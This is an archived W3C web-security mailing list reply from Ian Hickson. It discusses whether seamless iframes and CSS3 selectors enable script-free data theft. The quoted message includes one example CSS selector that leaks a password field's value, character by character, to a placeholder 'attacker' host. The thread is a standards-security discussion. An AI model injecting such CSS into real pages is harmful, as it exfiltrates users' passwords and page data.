W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Re: Seamless iframes + CSS3 selectors = bad idea

From: Ian Hickson <ian@hixie.ch>
Date: Sun, 6 Dec 2009 06:16:59 +0000 (UTC)
To: sird@rckc.at
Cc: public-web-security@w3.org
Message-ID: <Pine.LNX.4.62.0912060613520.5629@hixie.dreamhostps.com>
On Fri, 4 Dec 2009, Eduardo Vela wrote:
>
> I sincerely understand why people want seamless iframes on HTML5.. I 
> mean, I've been there.. but sometimes the better way to do something is 
> not to do it.
> 
> The perfect example are seamless iframes (defined in html5) and CSS3 
> selectors.
> 
> What I see with those awesome CSS3 selectors such as:
> 
> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
> 
> create a new type of XSS attacks, and those are purely CSS based XSS 
> attacks.. without JS.. that will allow an attacker to read arbitrary 
> files from the page WITHOUT the need of JS.

How is the attacker inserting CSS into the page, in this scenario?

I agree that if an attacker can insert CSS into a victim page, that 
numerous information retrieval attacks are possible (though not currently 
a password attack, as Maciej mentioned). However, this has long been 
known, it doesn't seem to be a new problem.

-- 
Ian Hickson               U+1047E                )\._.,--....,'``.    fL
http://ln.hixie.ch/       U+263A                /,   _.. \   _\  ;`._ ,.
Things that are impossible just take longer.   `._.-(,_..'--(,_..'`-.;.'
Received on Sunday, 6 December 2009 06:17:31 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Sunday, 19 December 2010 00:16:01 GMT